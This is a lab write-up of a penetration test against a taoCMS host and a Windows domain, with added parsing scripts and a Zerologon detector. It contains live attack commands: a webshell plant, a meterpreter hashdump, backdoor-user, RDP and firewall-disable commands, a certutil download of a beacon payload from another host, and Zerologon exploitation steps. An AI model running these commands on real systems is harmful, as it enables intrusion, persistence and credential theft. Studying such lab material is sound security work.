CMS #
fscan found taoCMS running on port 3590.
[root@Hacking] /home/kali/lab3
❯ dirsearch -u http://192.168.10.10:3590/
dirsearch v0.4.3
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.10.10:3590/
[04:11:00] Scanning:
[04:11:18] 301 - 240B - /ADMIN -> http://192.168.10.10:3590/ADMIN/
[04:11:18] 301 - 240B - /Admin -> http://192.168.10.10:3590/Admin/
[04:11:18] 301 - 240B - /admin -> http://192.168.10.10:3590/admin/
[04:11:18] 200 - 77B - /admin%20/
[04:11:18] 301 - 241B - /admin. -> http://192.168.10.10:3590/admin./
[04:11:19] 200 - 77B - /Admin/
[04:11:19] 200 - 77B - /admin/
[04:11:19] 200 - 66B - /admin/admin.php
[04:11:20] 200 - 77B - /admin/index.php
[04:11:32] 200 - 0B - /api.php
[04:11:37] 200 - 0B - /config.php
[04:11:38] 301 - 239B - /data -> http://192.168.10.10:3590/data/
[04:11:44] 200 - 894B - /favicon.ico
[04:11:50] 200 - 0B - /include/
[04:11:50] 301 - 242B - /include -> http://192.168.10.10:3590/include/
[04:11:50] 200 - 4KB - /index.php
[04:11:50] 200 - 4KB - /index.pHp
[04:11:50] 200 - 4KB - /index.php.
[04:11:51] 200 - 740B - /install.php
[04:11:51] 200 - 740B - /install.php?profile=default
[04:11:51] 404 - 0B - /index.php/login/
[04:11:53] 200 - 1KB - /LICENSE
[04:11:53] 200 - 1KB - /license
[04:12:04] 200 - 2KB - /README.MD
[04:12:04] 200 - 2KB - /README.md
[04:12:04] 200 - 2KB - /readme.md
[04:12:04] 200 - 2KB - /ReadMe.md
[04:12:04] 200 - 2KB - /Readme.md
[04:12:05] 200 - 977B - /rss.php
[04:12:11] 301 - 243B - /template -> http://192.168.10.10:3590/template/
Task Completed
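The scan output above carries more than the /admin path: /install.php still answers 200 with a real body, /config.php and /api.php return 200 with 0 bytes (include-only scripts that run but print nothing), and the case variants (/index.pHp, /README.MD, /readme.md, /Admin/, /admin/) all get identical answers, which only a case-insensitive filesystem does, so the target is a Windows host (the hashdump later in the writeup confirms it). The triage script below is an added example, not part of the original writeup; it parses a constructed copy of the dirsearch lines above, and the "two case-variant groups" threshold for calling the host case-insensitive is my own assumption.

```python
import re
from collections import defaultdict

# Constructed sample: the informative lines from the dirsearch run above,
# copied verbatim (a subset is enough to show the triage).
DIRSEARCH_OUTPUT = """\
[04:11:18] 301 - 240B - /ADMIN -> http://192.168.10.10:3590/ADMIN/
[04:11:18] 301 - 240B - /Admin -> http://192.168.10.10:3590/Admin/
[04:11:18] 301 - 240B - /admin -> http://192.168.10.10:3590/admin/
[04:11:19] 200 - 77B - /Admin/
[04:11:19] 200 - 77B - /admin/
[04:11:32] 200 - 0B - /api.php
[04:11:37] 200 - 0B - /config.php
[04:11:50] 200 - 4KB - /index.php
[04:11:50] 200 - 4KB - /index.pHp
[04:11:51] 200 - 740B - /install.php
[04:11:53] 200 - 1KB - /LICENSE
[04:11:53] 200 - 1KB - /license
[04:12:04] 200 - 2KB - /README.MD
[04:12:04] 200 - 2KB - /readme.md
[04:12:11] 301 - 243B - /template -> http://192.168.10.10:3590/template/
"""

# dirsearch result line: "[hh:mm:ss] <status> - <size> - <path>[ -> <redirect>]"
LINE_RE = re.compile(r"^\[\d\d:\d\d:\d\d\]\s+(\d{3})\s+-\s+(\S+)\s+-\s+(\S+)")


def parse_dirsearch(text):
    """Return (status, size, path) tuples for every result line."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            hits.append((int(m.group(1)), m.group(2), m.group(3)))
    return hits


def case_variant_groups(hits):
    """Group paths that differ only in letter case and got an identical
    (status, size) answer. The server resolved them to the same file, which
    happens on a case-insensitive filesystem (NTFS on Windows); a Linux host
    would 404 the odd-cased variants."""
    by_lower = defaultdict(list)
    for status, size, path in hits:
        by_lower[path.lower()].append((path, status, size))
    groups = {}
    for key, entries in by_lower.items():
        if len(entries) > 1 and len({(s, z) for _, s, z in entries}) == 1:
            groups[key] = sorted(p for p, _, _ in entries)
    return groups


def triage(hits):
    """Pull out the findings worth acting on from a dirsearch result list."""
    return {
        # Installer left reachable after deployment (often allows reinstall/reconfig).
        "installer_exposed": any(
            p.lower().endswith("install.php") and s == 200 and z != "0B"
            for s, z, p in hits
        ),
        # 200 with an empty body: scripts that exist and execute but emit nothing.
        "silent_includes": sorted(p for s, z, p in hits if s == 200 and z == "0B"),
        # Assumption: two or more case-variant groups => case-insensitive host.
        "case_insensitive_fs": len(case_variant_groups(hits)) >= 2,
        # Admin entry points that answered 200, deduplicated by case.
        "admin_paths": sorted({p.lower() for s, z, p in hits
                               if "admin" in p.lower() and s == 200}),
    }


if __name__ == "__main__":
    for key, value in triage(parse_dirsearch(DIRSEARCH_OUTPUT)).items():
        print(f"{key}: {value}")
```

The case-insensitivity inference is the useful one here: it tells you before any shell that payloads, paths and later privilege escalation will be Windows-flavoured (PHP on Windows, not a LAMP box), and that case tricks in uploaded filenames (e.g. .pHp) will be served as PHP.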
Brute-forcing the password failed; a quick search turned up the default credentials admin/tao, which worked. From the admin panel's file management page a backdoor (webshell) was added.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
apache:1002:aad3b435b51404eeaad3b435b51404ee:0047605c0f2b9342a96ff4502f0f1a84:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1003:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:809f928153e9cdf27a043a18028a6efd:::
web:1001:aad3b435b51404eeaad3b435b51404ee:a167976f7bd8d93ee232fa7a87a4079e:::
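The dump above is the local SAM (meterpreter hashdump), not domain hashes. Every row carries aad3b435b51404eeaad3b435b51404ee in the LM field, the LM hash of the empty string, so LM storage is off and only NTLM cracking applies. Administrator, Guest and DefaultAccount carry 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of the empty string, meaning a blank password or a disabled built-in that never had one; those are not worth cracking, while the four remaining hashes (including the attacker-added hack user) can go straight to hashcat -m 1000 or be used for pass-the-hash. The script below is an added example, not part of the writeup; it parses a constructed copy of the dump lines above.

```python
# Constructed copy of the hashdump output above (pwdump format:
# user:RID:LM-hash:NT-hash:::).
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
apache:1002:aad3b435b51404eeaad3b435b51404ee:0047605c0f2b9342a96ff4502f0f1a84:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1003:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:809f928153e9cdf27a043a18028a6efd:::
web:1001:aad3b435b51404eeaad3b435b51404ee:a167976f7bd8d93ee232fa7a87a4079e:::
"""

# LM hash of the empty string: LM storage is disabled (the default since
# Vista), so there is no LM hash to crack.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string (MD4 over the UTF-16LE encoding of ""): either
# a blank password or a disabled account whose password was never set.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_pwdump(text):
    """Parse pwdump-style lines into dicts with the checks already applied."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # blank line or something that is not a pwdump row
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        accounts.append({
            "user": user,
            "rid": rid,
            "lm": lm,
            "nt": nt,
            "blank_nt": nt == EMPTY_NT,
            "lm_stored": lm != EMPTY_LM,
            "builtin": rid < 1000,  # well-known RIDs: 500 Administrator, 501 Guest, ...
        })
    return accounts


def crackable(accounts):
    """Lines for hashcat -m 1000 (NTLM). The empty-string hash is skipped:
    it would only "crack" to the empty password and tells you nothing new."""
    return [f"{a['user']}:{a['nt']}" for a in accounts if not a["blank_nt"]]


def summarize(accounts):
    """What a pentester wants at a glance from a SAM dump."""
    return {
        "lm_disabled": all(not a["lm_stored"] for a in accounts),
        "blank_nt": [a["user"] for a in accounts if a["blank_nt"]],
        "local_accounts": [a["user"] for a in accounts if not a["builtin"]],
        "hashcat_ntlm": crackable(accounts),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_pwdump(HASHDUMP)).items():
        print(f"{key}: {value}")
```

RID 500 with the empty-string NT hash is worth a second look on any box: the built-in Administrator is usually disabled rather than passwordless, and a renamed built-in admin keeps RID 500, so filter on the RID, not on the name.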
Add a backdoor user and enable RDP. The REG ADD line relies on the Terminal" "Server quoting trick so that cmd.exe passes the space inside the key name through intact. Note that "netsh firewall" is the deprecated pre-Vista syntax (the current one is "netsh advfirewall"), and switching the whole firewall off is far noisier than opening TCP/3389 alone.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
Backdoor #
Noticed the host also sits on a second subnet, the 192.168.20.x segment.
admin123
After configuring a proxy in AntSword (蚁剑) through the compromised host, the webshell on the inner segment connects normally.
CVE-2020-1472 #
Try the Zerologon attack (CVE-2020-1472), which abuses the Netlogon authentication flaw to reset the domain controller's computer account password to an empty string. Caveat: the empty password is written to AD but not to the DC's own local machine-account secret, so the DC's secure channel and replication break until it is put back; dump what you need (e.g. via DCSync) and then restore the original machine account password from the dumped secrets.
certutil -urlcache -split -f http://192.168.20.20:8055/beacon_x64.exe beacon.exe
netsh firewall set opmode disable
Finally, all hosts are online (every beacon checks in).
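The Zerologon reset described in this section leaves a trace a defender can search for: on the DC, Security event 4742 ("A computer account was changed") for the DC's own machine account, with PasswordLastSet updated and the subject being ANONYMOUS LOGON (SID S-1-5-7), because the Netlogon call that performed the reset never authenticated. The detector below is an added example, not part of the original writeup or of any tool used in it; the events are constructed (the DC name DC01$, the SIDs and the timestamps are made up) but use the field names of the 4742 EventData, and the DC allowlist is an assumption.

```python
# Constructed sample 4742 events. The first has the shape a Zerologon
# password reset leaves on the DC; the other two are benign.
EVENTS = [
    {"EventID": 4742, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "SubjectDomainName": "NT AUTHORITY", "TargetUserName": "DC01$",
     "TargetDomainName": "LAB", "PasswordLastSet": "2020-09-14 12:00:00"},
    # Routine machine-account password rotation: the computer changes its own password.
    {"EventID": 4742, "SubjectUserSid": "S-1-5-21-1-2-3-1000", "SubjectUserName": "DC01$",
     "SubjectDomainName": "LAB", "TargetUserName": "DC01$",
     "TargetDomainName": "LAB", "PasswordLastSet": "2020-09-01 03:15:00"},
    # Attribute change on a workstation with no password reset (PasswordLastSet stays "-").
    {"EventID": 4742, "SubjectUserSid": "S-1-5-21-1-2-3-1105", "SubjectUserName": "itadmin",
     "SubjectDomainName": "LAB", "TargetUserName": "WS01$",
     "TargetDomainName": "LAB", "PasswordLastSet": "-"},
]

ANONYMOUS_LOGON_SID = "S-1-5-7"
# Assumption: the domain controllers' computer accounts in this lab domain.
DOMAIN_CONTROLLERS = {"DC01$"}


def detect_zerologon_reset(events, dcs=DOMAIN_CONTROLLERS):
    """Return (severity, target, subject) for 4742 events that look like a
    Netlogon-based machine-account password reset.

    high:   password reset of any computer account by ANONYMOUS LOGON, which
            is exactly what the unauthenticated Zerologon NetrServerPasswordSet2
            call produces.
    medium: password reset of a DC account by anyone other than the DC
            itself (legitimate rotation is done by the machine account)."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4742:
            continue
        target = e.get("TargetUserName", "")
        if not target.endswith("$") or e.get("PasswordLastSet", "-") == "-":
            continue  # not a computer account, or no password change in this event
        subject = e.get("SubjectUserName", "")
        if e.get("SubjectUserSid") == ANONYMOUS_LOGON_SID:
            severity = "high"
        elif target in dcs and subject != target:
            severity = "medium"
        else:
            continue
        alerts.append((severity, target, subject))
    return alerts


if __name__ == "__main__":
    for alert in detect_zerologon_reset(EVENTS):
        print(alert)
```

On a patched DC the same exploitation attempt is refused and additionally surfaces as Netlogon events 5827/5828 in the System log; the 4742 rule is the one that catches a DC that is still vulnerable, which is the situation this writeup exploits.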